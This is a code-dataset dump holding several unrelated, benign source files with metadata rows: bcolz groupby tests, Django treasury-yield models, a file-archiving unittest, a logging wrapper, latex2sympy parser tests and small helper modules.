[(0, 1),
(1, 1),
(1, 2),
(0, 2),
(1, 2),
(2, 2),
(0, 3),
(0, 3),
(1, 4)],
dtype='i8,i8')
# -- Bcolz --
with self.on_disk_data_cleaner(data) as ct:
barr = ct.where_terms([('f0', 'in', [0, 1])])
result_bcolz = ct.groupby(groupby_cols, agg_list,
bool_arr=barr)
assert_list_equal([list(x) for x in result_bcolz], [[0, 3], [1, 3]])
def test_groupby_14(self):
"""
test_groupby_14: Groupby type 'mean'
"""
random.seed(1)
groupby_cols = ['f0']
groupby_lambda = lambda x: x[0]
agg_list = [['f4', 'mean'], ['f5', 'mean'], ['f6', 'mean']]
agg_lambda = lambda x: [x[4], x[5], x[6]]
num_rows = 2000
# -- Data --
g = self.gen_almost_unique_row(num_rows)
data = np.fromiter(g, dtype='S1,f8,i8,i4,f8,i8,i4')
# -- Bcolz --
print('--> Bcolz')
self.rootdir = tempfile.mkdtemp(prefix='bcolz-')
os.rmdir(self.rootdir) # folder should be emtpy
fact_bcolz = bquery.ctable(data, rootdir=self.rootdir)
fact_bcolz.flush()
fact_bcolz.cache_factor(groupby_cols, refresh=True)
result_bcolz = fact_bcolz.groupby(groupby_cols, agg_list)
print(result_bcolz)
# Itertools result
print('--> Itertools')
result_itt = self.helper_itt_groupby(data, groupby_lambda)
uniquekeys = result_itt['uniquekeys']
print(uniquekeys)
ref = []
for item in result_itt['groups']:
f4 = []
f5 = []
f6 = []
for row in item:
f0 = groupby_lambda(row)
f4.append(row[4])
f5.append(row[5])
f6.append(row[6])
ref.append([np.mean(f4), np.mean(f5), np.mean(f6)])
# remove the first (text) element for floating point comparison
result = [list(x[1:]) for x in result_bcolz]
assert_allclose(result, ref, rtol=1e-10)
def test_groupby_15(self):
"""
test_groupby_15: Groupby type 'std'
"""
random.seed(1)
groupby_cols = ['f0']
groupby_lambda = lambda x: x[0]
agg_list = [['f4', 'std'], ['f5', 'std'], ['f6', 'std']]
agg_lambda = lambda x: [x[4], x[5], x[6]]
num_rows = 2000
# -- Data --
g = self.gen_almost_unique_row(num_rows)
data = np.fromiter(g, dtype='S1,f8,i8,i4,f8,i8,i4')
# -- Bcolz --
print('--> Bcolz')
self.rootdir = tempfile.mkdtemp(prefix='bcolz-')
os.rmdir(self.rootdir) # folder should be emtpy
fact_bcolz = bquery.ctable(data, rootdir=self.rootdir)
fact_bcolz.flush()
fact_bcolz.cache_factor(groupby_cols, refresh=True)
result_bcolz = fact_bcolz.groupby(groupby_cols, agg_list)
print(result_bcolz)
# Itertools result
print('--> Itertools')
result_itt = self.helper_itt_groupby(data, groupby_lambda)
uniquekeys = result_itt['uniquekeys']
print(uniquekeys)
ref = []
for item in result_itt['groups']:
f4 = []
f5 = []
f6 = []
for row in item:
f0 = groupby_lambda(row)
f4.append(row[4])
f5.append(row[5])
f6.append(row[6])
ref.append([np.std(f4), np.std(f5), np.std(f6)])
# remove the first (text) element for floating point comparison
result = [list(x[1:]) for x in result_bcolz]
assert_allclose(result, ref, rtol=1e-10)
def _assert_list_equal(self, a, b):
assert_list_equal(a, b)
def test_where_terms00(self):
"""
test_where_terms00: get terms in one column bigger than a certain value
"""
# expected result
ref_data = np.fromiter(((x > 10000) for x in range(20000)),
dtype='bool')
ref_result = bquery.carray(ref_data)
# generate data to filter on
iterable = ((x, x) for x in range(20000))
data = np.fromiter(iterable, dtype='i8,i8')
# filter data
terms_filter = [('f0', '>', 10000)]
ct = bquery.ctable(data, rootdir=self.rootdir)
result = ct.where_terms(terms_filter)
# compare
assert_array_equal(result, ref_result)
def test_where_terms01(self):
"""
test_where_terms01: get terms in one column less or equal than a
certain value
"""
# expected result
ref_data = np.fromiter(((x <= 10000) for x in range(20000)),
dtype='bool')
ref_result = bquery.carray(ref_data)
# generate data to filter on
iterable = ((x, x) for x in range(20000))
data = np.fromiter(iterable, dtype='i8,i8')
# filter data
terms_filter = [('f0', '<=', 10000)]
ct = bquery.ctable(data, rootdir=self.rootdir)
result = ct.where_terms(terms_filter)
# compare
assert_array_equal(result, ref_result)
def test_where_terms02(self):
"""
test_where_terms02: get mask where terms not in list
"""
exclude = [0, 1, 2, 3, 11, 12, 13]
# expected result
mask = np.ones(20000, dtype=bool)
mask[exclude] = False
# generate data to filter on
iterable = ((x, x) for x in range(20000))
data = np.fromiter(iterable, dtype='i8,i8')
# filter data
terms_filter = [('f0', 'not in', exclude)]
ct = bquery.ctable(data, rootdir=self.rootdir)
result = ct.where_terms(terms_filter)
assert_array_equal(result, mask)
def test_where_terms03(self):
"""
test_where_terms03: get mask where terms in list
"""
include = [0, 1, 2, 3, 11, 12, 13]
# expected result
mask = np.zeros(20000, dtype=bool)
mask[include] = True
# generate data to filter on
iterable = ((x, x) for x in range(20000))
data = np.fromiter(iterable, dtype='i8,i8')
# filter data
terms_filter = [('f0', 'in', include)]
ct = bquery.ctable(data, rootdir=self.rootdir)
result = ct.where_terms(terms_filter)
assert_array_equal(result, mask)
def test_where_terms_04(self):
"""
test_where_terms04: get mask where terms in list with only one item
"""
include = [0]
# expected result
mask = np.zeros(20000, dtype=bool)
mask[include] = True
# generate data to filter on
iterable = ((x, x) for x in range(20000))
data = np.fromiter(iterable, dtype='i8,i8')
# filter data
terms_filter = [('f0', 'in', include)]
ct = bquery.ctable(data, rootdir=self.rootdir)
result = ct.where_terms(terms_filter)
assert_array_equal(result, mask)
def test_factorize_groupby_cols_01(self):
"""
test_factorize_groupby_cols_01:
"""
ref_fact_table = np.arange(20000) % 5
ref_fact_groups = np.arange(5)
# generate data
iterable = ((x, x % 5) for x in range(20000))
data = np.fromiter(iterable, dtype='i8,i8')
ct = bquery.ctable(data, rootdir=tempfile.mkdtemp(prefix='bcolz-'), mode='w')
# factorize - check the only factirized col. [0]
fact_1 = ct.factorize_groupby_cols(['f1'])
# cache should be used this time
fact_2 = ct.factorize_groupby_cols(['f1'])
assert_array_equal(ref_fact_table, fact_1[0][0])
assert_array_equal(ref_fact_groups, fact_1[1][0])
assert_array_equal(fact_1[0][0], fact_2[0][0])
assert_array_equal(fact_1[1][0], fact_2[1][0])
def test_pos_basket_01(self):
"""test_pos_basket_01:
<----- data ----->
| Basket | Product | Filter | Result |
|--------|---------|--------|--------|
| 1 | A | 0 | 1 |
| 1 | B | 1 | 1 |
| 1 | C | 0 | 1 |
| 2 | A | 0 | 1 |
| 2 | B | 1 | 1 |
| 3 | A | 0 | 0 |
| 4 | A | 0 | 0 |
| 4 | C | 0 | 0 |
| 5 | B | 1 | 1 |
| 6 | A | 0 | 1 |
| 6 | B | 1 | 1 |
| 6 | C | 0 | 1 |
| 7 | B | 1 | 1 |
| 7 | B | 1 | 1 |
| 7 | B | 1 | 1 |
| 8 | B | 1 | 1 |
| 9 | C | 0 | 0 |
"""
# -- Data --
data = np.array(
[(1, 0),
(1, 1),
(1, 2),
(2, 0),
(2, 1),
(3, 0),
(4, 0),
(4, 2),
(5, 1),
(6, 0),
(6, 1),
(6, 2),
(7, 1),
(7, 1),
(7, 1),
(8, 1),
(9, 2),
],
dtype='i8,i8')
# -- Bcolz --
with self.on_disk_data_cleaner(data) as ct:
f1 = ct['f1']
barr = bz.eval("f1 == 1") # filter
result = ct.is_in_ordered_subgroups(basket_col='f0', bool_arr=barr,
_max_len_subgroup=1)
assert_list_equal(list(barr[:]),
[False, True, False, False, True, False, False, False,
True, False, True, False, True, True, True, True,
False])
assert_list_equal(list(result[:]),
[True, True, True, True, True, False, False, False,
True, True, True, True, True, True, True, True,
False])
if __name__ == '__main__':
nose.main()
| 31.774884
| 118
| 0.49353
| 4,138
| 34,158
| 3.898018
| 0.063074
| 0.03478
| 0.013763
| 0.017855
| 0.829076
| 0.794048
| 0.77204
| 0.76212
| 0.751457
| 0.746683
| 0
| 0.04953
| 0.374641
| 34,158
| 1,074
| 119
| 31.804469
| 0.705585
| 0.119269
| 0
| 0.735376
| 0
| 0
| 0.050853
| 0.006485
| 0
| 0
| 0
| 0
| 0.045961
| 1
| 0.047354
| false
| 0
| 0.020891
| 0
| 0.072423
| 0.079387
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
c9a994c1410bce6782eb0e7284ec2acbe3cf6240
| 841
|
py
|
Python
|
website/index/models.py
|
FrederichRiver/neutrino3
|
c16c6ea824999c012252d0e281473a6ab13fd38e
|
[
"BSD-3-Clause"
] | 1
|
2021-07-12T11:20:58.000Z
|
2021-07-12T11:20:58.000Z
|
website/index/models.py
|
FrederichRiver/neutrino3
|
c16c6ea824999c012252d0e281473a6ab13fd38e
|
[
"BSD-3-Clause"
] | null | null | null |
website/index/models.py
|
FrederichRiver/neutrino3
|
c16c6ea824999c012252d0e281473a6ab13fd38e
|
[
"BSD-3-Clause"
] | null | null | null |
from django.db import models
class china_treasury_yield(models.Model):
report_date = models.DateField(primary_key=True)
two_year = models.FloatField(blank=True, null=True)
five_year = models.FloatField(blank=True, null=True)
ten_year = models.FloatField(blank=True, null=True)
three_decade = models.FloatField(blank=True, null=True)
class Meta:
managed = False
db_table = 'china_treasury_yield'
class us_treasury_yield(models.Model):
report_date = models.DateField(primary_key=True)
two_year = models.FloatField(blank=True, null=True)
five_year = models.FloatField(blank=True, null=True)
ten_year = models.FloatField(blank=True, null=True)
three_decade = models.FloatField(blank=True, null=True)
class Meta:
managed = False
db_table = 'us_treasury_yield'
| 32.346154
| 59
| 0.722949
| 113
| 841
| 5.185841
| 0.265487
| 0.21843
| 0.286689
| 0.341297
| 0.87372
| 0.87372
| 0.87372
| 0.87372
| 0.87372
| 0.87372
| 0
| 0
| 0.175981
| 841
| 25
| 60
| 33.64
| 0.845599
| 0
| 0
| 0.736842
| 0
| 0
| 0.043995
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.052632
| 0
| 0.789474
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 11
|
c9cc546111e45c9d5a98fc8dfd3a784dde627b36
| 8,542
|
py
|
Python
|
archive_test.py
|
peterloron/archive
|
6ae75272285d05593f064c945c9c1e77d510e1a8
|
[
"MIT"
] | null | null | null |
archive_test.py
|
peterloron/archive
|
6ae75272285d05593f064c945c9c1e77d510e1a8
|
[
"MIT"
] | null | null | null |
archive_test.py
|
peterloron/archive
|
6ae75272285d05593f064c945c9c1e77d510e1a8
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import unittest
import os
import datetime
import calendar
import subprocess
import shutil
class TestArchive(unittest.TestCase):
ROOT = os.getcwd()
BACK95 = calendar.timegm((datetime.datetime.utcnow() - (datetime.timedelta(days=95))).timetuple())
BACK46 = calendar.timegm((datetime.datetime.utcnow() - (datetime.timedelta(days=46))).timetuple())
@classmethod
def setUpClass(cls):
# do a bit of pre-emptive cleanup
try:
shutil.rmtree(os.path.join(cls.ROOT, "testout"), ignore_errors=True)
except:
None
try:
shutil.rmtree(os.path.join(cls.ROOT, "1Folder Space"), ignore_errors=True)
except:
None
try:
os.remove(os.path.join(cls.ROOT, "archive.log"))
except:
None
# create tree of data to be processed
os.mkdir(os.path.join(cls.ROOT, "testout"))
os.mkdir(os.path.join(cls.ROOT, "1Folder Space"))
os.mkdir(os.path.join(cls.ROOT, "1Folder Space", "2Folder"))
os.mkdir(os.path.join(cls.ROOT, "1Folder Space", "3Folder With Space"))
os.mkdir(os.path.join(cls.ROOT, "1Folder Space", "3Folder With Space", "4Folder"))
os.mkdir(os.path.join(cls.ROOT, "1Folder Space", "3Folder With Space", "5Folder"))
thepath = os.path.join(cls.ROOT, "1Folder Space")
open(os.path.join(thepath, "1A.txt"), 'a').close()
os.utime(os.path.join(thepath, "1A.txt"), (cls.BACK95, cls.BACK95))
open(os.path.join(thepath, "1B.txt"), 'a').close()
os.utime(os.path.join(thepath, "1B.txt"), (cls.BACK95, cls.BACK95))
open(os.path.join(thepath, "Iris–Waveguide Interface - MechanicAspects.pptx"), 'a').close()
os.utime(os.path.join(thepath, "Iris–Waveguide Interface - MechanicAspects.pptx"), (cls.BACK95, cls.BACK95))
thepath = os.path.join(cls.ROOT, "1Folder Space", "2Folder")
open(os.path.join(thepath, "2A.txt"), 'a').close()
os.utime(os.path.join(thepath, "2A.txt"), (cls.BACK46, cls.BACK46))
open(os.path.join(thepath, "2B.txt"), 'a').close()
os.utime(os.path.join(thepath, "2B.txt"), (cls.BACK95, cls.BACK95))
thepath = os.path.join(cls.ROOT, "1Folder Space", "3Folder With Space", "4Folder")
open(os.path.join(thepath, "4A.txt"), 'a').close()
os.utime(os.path.join(thepath, "4A.txt"), (cls.BACK46, cls.BACK46))
open(os.path.join(thepath, "4B.txt"), 'a').close()
os.utime(os.path.join(thepath, "4B.txt"), (cls.BACK95, cls.BACK95))
thepath = os.path.join(cls.ROOT, "1Folder Space", "3Folder With Space", "5Folder")
open(os.path.join(thepath, "5A.txt"), 'a').close()
os.utime(os.path.join(thepath, "5A.txt"), (cls.BACK95, cls.BACK95))
open(os.path.join(thepath, "5B.txt"), 'a').close()
os.utime(os.path.join(thepath, "5B.txt"), (cls.BACK95, cls.BACK95))
for i in range(100):
open(os.path.join(thepath, ("%dC.txt" % i)), 'a').close()
os.utime(os.path.join(thepath, ("%dC.txt" % i)), (cls.BACK95, cls.BACK95))
@classmethod
def tearDownClass(cls):
shutil.rmtree(os.path.join(cls.ROOT, "testout"), ignore_errors=True)
shutil.rmtree(os.path.join(cls.ROOT, "1Folder Space"), ignore_errors=True)
None
def testFirstPass(self):
# run a pass of archive
subprocess.check_call(['/usr/bin/python', 'archive.py', '-a90', '-s./1Folder Space', '-d./testout/1Folder Space'])
# check what we have in the source
thepath = os.path.join(self.ROOT, "1Folder Space")
self.assertTrue(os.path.exists(thepath))
self.assertFalse(os.path.exists(os.path.join(thepath, "1A.txt")))
self.assertFalse(os.path.exists(os.path.join(thepath, "1B.txt")))
self.assertTrue(os.path.exists(os.path.join(thepath, "2Folder")))
self.assertTrue(os.path.exists(os.path.join(thepath, "3Folder With Space")))
self.assertFalse(os.path.exists(os.path.join(thepath, "Iris–Waveguide Interface - MechanicAspects.pptx")))
thepath = os.path.join(self.ROOT, "1Folder Space", "2Folder")
self.assertTrue(os.path.exists(os.path.join(thepath, "2A.txt")))
self.assertFalse(os.path.exists(os.path.join(thepath, "2B.txt")))
thepath = os.path.join(self.ROOT, "1Folder Space", "3Folder With Space")
self.assertTrue(os.path.exists(os.path.join(thepath, "4Folder")))
self.assertFalse(os.path.exists(os.path.join(thepath, "5Folder")))
thepath = os.path.join(self.ROOT, "1Folder Space", "3Folder With Space", "4Folder")
self.assertTrue(os.path.exists(os.path.join(thepath, "4A.txt")))
self.assertFalse(os.path.exists(os.path.join(thepath, "4B.txt")))
for i in range(100):
self.assertFalse(os.path.exists(os.path.join(thepath, ("%dC.txt" % i))))
# check what we have in the destination
thepath = os.path.join(self.ROOT, "testout", "1Folder Space")
self.assertTrue(os.path.exists(thepath))
self.assertTrue(os.path.exists(os.path.join(thepath, "1A.txt")))
self.assertTrue(os.path.exists(os.path.join(thepath, "1B.txt")))
self.assertTrue(os.path.exists(os.path.join(thepath, "2Folder")))
self.assertTrue(os.path.exists(os.path.join(thepath, "3Folder With Space")))
self.assertTrue(os.path.exists(os.path.join(thepath, "Iris–Waveguide Interface - MechanicAspects.pptx")))
thepath = os.path.join(self.ROOT, "testout", "1Folder Space", "2Folder")
self.assertFalse(os.path.exists(os.path.join(thepath, "2A.txt")))
self.assertTrue(os.path.exists(os.path.join(thepath, "2B.txt")))
thepath = os.path.join(self.ROOT, "testout", "1Folder Space", "3Folder With Space")
self.assertTrue(os.path.exists(os.path.join(thepath, "4Folder")))
self.assertTrue(os.path.exists(os.path.join(thepath, "5Folder")))
thepath = os.path.join(self.ROOT, "testout", "1Folder Space", "3Folder With Space", "4Folder")
self.assertFalse(os.path.exists(os.path.join(thepath, "4A.txt")))
self.assertTrue(os.path.exists(os.path.join(thepath, "4B.txt")))
thepath = os.path.join(self.ROOT, "testout", "1Folder Space", "3Folder With Space", "5Folder")
self.assertTrue(os.path.exists(os.path.join(thepath, "5A.txt")))
self.assertTrue(os.path.exists(os.path.join(thepath, "5B.txt")))
for i in range(100):
self.assertTrue(os.path.exists(os.path.join(thepath, ("%dC.txt" % i))))
def testSecondPass(self):
# run a pass of archive
subprocess.check_call(['/usr/bin/python', 'archive.py', '-a30', '-s./1Folder Space', '-d./testout/1Folder Space'])
# check what we have in the source
thepath = os.path.join(self.ROOT, "1Folder Space")
self.assertFalse(os.path.exists(thepath))
# check what we have in the destination
thepath = os.path.join(self.ROOT, "testout", "1Folder Space")
self.assertTrue(os.path.exists(thepath))
self.assertTrue(os.path.exists(os.path.join(thepath, "1A.txt")))
self.assertTrue(os.path.exists(os.path.join(thepath, "1B.txt")))
self.assertTrue(os.path.exists(os.path.join(thepath, "2Folder")))
self.assertTrue(os.path.exists(os.path.join(thepath, "3Folder With Space")))
self.assertTrue(os.path.exists(os.path.join(thepath, "Iris–Waveguide Interface - MechanicAspects.pptx")))
thepath = os.path.join(self.ROOT, "testout", "1Folder Space", "2Folder")
self.assertTrue(os.path.exists(os.path.join(thepath, "2A.txt")))
self.assertTrue(os.path.exists(os.path.join(thepath, "2B.txt")))
thepath = os.path.join(self.ROOT, "testout", "1Folder Space", "3Folder With Space")
self.assertTrue(os.path.exists(os.path.join(thepath, "4Folder")))
self.assertTrue(os.path.exists(os.path.join(thepath, "5Folder")))
thepath = os.path.join(self.ROOT, "testout", "1Folder Space", "3Folder With Space", "4Folder")
self.assertTrue(os.path.exists(os.path.join(thepath, "4A.txt")))
self.assertTrue(os.path.exists(os.path.join(thepath, "4B.txt")))
thepath = os.path.join(self.ROOT, "testout", "1Folder Space", "3Folder With Space", "5Folder")
self.assertTrue(os.path.exists(os.path.join(thepath, "5A.txt")))
self.assertTrue(os.path.exists(os.path.join(thepath, "5B.txt")))
if __name__ == '__main__':
unittest.main()
| 50.247059
| 122
| 0.637556
| 1,180
| 8,542
| 4.607627
| 0.098305
| 0.145669
| 0.163693
| 0.184477
| 0.924591
| 0.9119
| 0.883208
| 0.86831
| 0.829134
| 0.756483
| 0
| 0.024195
| 0.182276
| 8,542
| 169
| 123
| 50.544379
| 0.753472
| 0.034652
| 0
| 0.5
| 0
| 0
| 0.186984
| 0
| 0
| 0
| 0
| 0
| 0.34127
| 1
| 0.031746
| false
| 0.015873
| 0.047619
| 0
| 0.111111
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
a00847664142966315966adad00658d0073eddad
| 2,577
|
py
|
Python
|
src/conformity_migration_tool/logger.py
|
ronald-bautista/conformity-migration-tool
|
03b8a7a9fb99bb3f975d85db0a2c1ae1205cad2f
|
[
"MIT"
] | 1
|
2022-03-24T19:54:13.000Z
|
2022-03-24T19:54:13.000Z
|
src/conformity_migration_tool/logger.py
|
ronald-bautista/conformity-migration-tool
|
03b8a7a9fb99bb3f975d85db0a2c1ae1205cad2f
|
[
"MIT"
] | null | null | null |
src/conformity_migration_tool/logger.py
|
ronald-bautista/conformity-migration-tool
|
03b8a7a9fb99bb3f975d85db0a2c1ae1205cad2f
|
[
"MIT"
] | 4
|
2022-01-27T21:16:18.000Z
|
2022-03-24T15:24:12.000Z
|
import logging
class Logger:
def info(self, msg: object, *args, file_only=False, **kwargs) -> None:
...
def warn(self, msg: object, *args, file_only=False, **kwargs) -> None:
...
def debug(self, msg: object, *args, file_only=False, **kwargs) -> None:
...
def error(self, msg: object, *args, file_only=False, **kwargs) -> None:
...
def exception(self, msg: object, *args, file_only=False, **kwargs) -> None:
...
class AppLogger(Logger):
def __init__(self, logger: logging.Logger) -> None:
self.logger = logger
def _prepare_for_log(self, kwargs: dict, file_only=False):
# remove these params from converted print statements
kwargs.pop("end", None)
kwargs.pop("flush", None)
extra: dict = kwargs.setdefault("extra", dict())
extra["file_only"] = file_only
def info(self, msg: object, *args, file_only=False, **kwargs) -> None:
self._prepare_for_log(kwargs, file_only=file_only)
return self.logger.info(msg, *args, **kwargs)
def warn(self, msg: object, *args, file_only=False, **kwargs) -> None:
self._prepare_for_log(kwargs, file_only=file_only)
return self.logger.warning(msg, *args, **kwargs)
def debug(self, msg: object, *args, file_only=False, **kwargs) -> None:
self._prepare_for_log(kwargs, file_only=file_only)
return self.logger.debug(msg, *args, **kwargs)
def error(self, msg: object, *args, file_only=False, **kwargs) -> None:
self._prepare_for_log(kwargs, file_only=file_only)
return self.logger.error(msg, *args, **kwargs)
def exception(self, msg: object, *args, file_only=False, **kwargs) -> None:
self._prepare_for_log(kwargs, file_only=file_only)
return self.logger.exception(msg, *args, **kwargs)
class NoStrackTraceExceptionFormatter(logging.Formatter):
def formatException(self, exc_info) -> str:
return str(exc_info[1])
def format(self, record: logging.LogRecord):
# clears cached exc_text formatted by other Formatter.formatException(record.exc_info)
record.exc_text = ""
return super().format(record=record)
class WithStrackTraceExceptionFormatter(logging.Formatter):
def formatException(self, exc_info) -> str:
return super().formatException(exc_info)
def format(self, record: logging.LogRecord):
# clears cached exc_text formatted by other Formatter.formatException(record.exc_info)
record.exc_text = ""
return super().format(record=record)
| 35.791667
| 94
| 0.658906
| 325
| 2,577
| 5.055385
| 0.172308
| 0.11199
| 0.087036
| 0.103469
| 0.709069
| 0.709069
| 0.709069
| 0.709069
| 0.709069
| 0.643335
| 0
| 0.000489
| 0.207218
| 2,577
| 71
| 95
| 36.295775
| 0.80372
| 0.085759
| 0
| 0.595745
| 0
| 0
| 0.009354
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.340426
| false
| 0
| 0.021277
| 0.042553
| 0.638298
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 7
|
a009fec97ec6f01cb9a7f3e879281e82ad662e92
| 155
|
py
|
Python
|
src/spaceone/monitoring/service/__init__.py
|
jihyungSong/plugin-aws-health
|
a3e43dff6c7c5c2e911bc5141807e124ee8be2fe
|
[
"Apache-2.0"
] | 2
|
2020-06-22T01:48:21.000Z
|
2020-08-07T05:22:55.000Z
|
src/spaceone/monitoring/service/__init__.py
|
jihyungSong/plugin-aws-health
|
a3e43dff6c7c5c2e911bc5141807e124ee8be2fe
|
[
"Apache-2.0"
] | null | null | null |
src/spaceone/monitoring/service/__init__.py
|
jihyungSong/plugin-aws-health
|
a3e43dff6c7c5c2e911bc5141807e124ee8be2fe
|
[
"Apache-2.0"
] | 3
|
2020-09-09T03:34:25.000Z
|
2021-03-25T05:19:40.000Z
|
from spaceone.monitoring.service.monitoring_service import MonitoringService
from spaceone.monitoring.service.data_source_service import DataSourceService
| 51.666667
| 77
| 0.909677
| 17
| 155
| 8.117647
| 0.529412
| 0.369565
| 0.318841
| 0.42029
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.051613
| 155
| 2
| 78
| 77.5
| 0.938776
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
4ecc88b6ae151b364560dd4dce99e61c7966107f
| 2,337
|
py
|
Python
|
tests/atom_expr_test.py
|
purdue-tlt/latex2sympy
|
f3e29fbf1e6979c6416844073863bbaa976927fc
|
[
"MIT"
] | 11
|
2020-05-19T19:56:50.000Z
|
2022-03-31T08:31:56.000Z
|
tests/atom_expr_test.py
|
purdue-tlt/latex2sympy
|
f3e29fbf1e6979c6416844073863bbaa976927fc
|
[
"MIT"
] | 14
|
2019-06-06T14:47:15.000Z
|
2022-03-28T14:40:41.000Z
|
tests/atom_expr_test.py
|
purdue-tlt/latex2sympy
|
f3e29fbf1e6979c6416844073863bbaa976927fc
|
[
"MIT"
] | 4
|
2020-07-11T21:39:16.000Z
|
2021-05-10T11:10:12.000Z
|
from .context import assert_equal
import pytest
from sympy import Symbol, Integer, Pow
# label, text, symbol_text
symbols = [
('letter', 'x', 'x'),
('greek letter', '\\lambda', 'lambda'),
('greek letter w/ space', '\\alpha ', 'alpha'),
('accented letter', '\\overline{x}', 'xbar')
]
subscripts = [
('2'),
('{23}'),
('i'),
('{ij}'),
('{i,j}'),
('{good}'),
('{x^{2}}')
]
examples = []
for symbol in symbols:
for subscript in subscripts:
examples.append(tuple(list(symbol) + [subscript]))
@pytest.mark.parametrize('label, text, symbol_text, subscript', examples)
def test_with_supexpr(label, text, symbol_text, subscript):
assert_equal(text + '^2', Pow(Symbol(symbol_text, real=True, positive=True), Integer(2)))
@pytest.mark.parametrize('label, text, symbol_text, subscript', examples)
def test_with_subexpr(label, text, symbol_text, subscript):
assert_equal(text + '_' + subscript, Symbol(symbol_text + '_' + subscript, real=True, positive=True))
@pytest.mark.parametrize('label, text, symbol_text, subscript', examples)
def test_with_subexpr_before_supexpr(label, text, symbol_text, subscript):
assert_equal(text + '_' + subscript + '^2', Pow(Symbol(symbol_text + '_' + subscript, real=True, positive=True), Integer(2)))
@pytest.mark.parametrize('label, text, symbol_text, subscript', examples)
def test_with_subexpr_before_supexpr_with_braces(label, text, symbol_text, subscript):
wrapped_subscript = subscript if '{' in subscript else '{' + subscript + '}'
assert_equal(text + '_' + wrapped_subscript + '^{2}', Pow(Symbol(symbol_text + '_' + subscript, real=True, positive=True), Integer(2)))
@pytest.mark.parametrize('label, text, symbol_text, subscript', examples)
def test_with_supexpr_before_subexpr(label, text, symbol_text, subscript):
assert_equal(text + '^2_' + subscript, Pow(Symbol(symbol_text + '_' + subscript, real=True, positive=True), Integer(2)))
@pytest.mark.parametrize('label, text, symbol_text, subscript', examples)
def test_with_supexpr_before_subexpr_with_braces(label, text, symbol_text, subscript):
wrapped_subscript = subscript if '{' in subscript else '{' + subscript + '}'
assert_equal(text + '^{2}_' + wrapped_subscript, Pow(Symbol(symbol_text + '_' + subscript, real=True, positive=True), Integer(2)))
| 39.610169
| 139
| 0.693196
| 289
| 2,337
| 5.384083
| 0.179931
| 0.122108
| 0.207584
| 0.15874
| 0.802057
| 0.789203
| 0.789203
| 0.789203
| 0.760283
| 0.642674
| 0
| 0.006965
| 0.139923
| 2,337
| 58
| 140
| 40.293103
| 0.767164
| 0.01027
| 0
| 0.190476
| 0
| 0
| 0.159238
| 0
| 0
| 0
| 0
| 0
| 0.166667
| 1
| 0.142857
| false
| 0
| 0.071429
| 0
| 0.214286
| 0
| 0
| 0
| 0
| null | 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
093d867bc78bab69dd379b27027066a010b3b665
| 200
|
py
|
Python
|
tests/utils.py
|
frainfreeze/sqlalchemy-filters-plus
|
1886cf39110504aee54330857b8317a31cd9606e
|
[
"BSD-3-Clause"
] | 25
|
2021-03-28T18:28:01.000Z
|
2022-03-19T00:35:48.000Z
|
tests/utils.py
|
frainfreeze/sqlalchemy-filters-plus
|
1886cf39110504aee54330857b8317a31cd9606e
|
[
"BSD-3-Clause"
] | 3
|
2021-09-20T16:37:39.000Z
|
2022-03-21T00:47:23.000Z
|
tests/utils.py
|
frainfreeze/sqlalchemy-filters-plus
|
1886cf39110504aee54330857b8317a31cd9606e
|
[
"BSD-3-Clause"
] | 4
|
2021-08-28T02:54:16.000Z
|
2022-02-25T11:57:35.000Z
|
def compares_expressions(exp1, exp2) -> bool:
def compile_exp(exp):
return exp.compile(compile_kwargs={"literal_binds": True})
return str(compile_exp(exp1)) == str(compile_exp(exp2))
| 33.333333
| 66
| 0.705
| 27
| 200
| 5
| 0.518519
| 0.222222
| 0.192593
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.023669
| 0.155
| 200
| 5
| 67
| 40
| 0.775148
| 0
| 0
| 0
| 0
| 0
| 0.065
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| false
| 0
| 0
| 0.25
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 7
|
1185a813c87a602d02f8115a953688188f6b39a8
| 17,983
|
py
|
Python
|
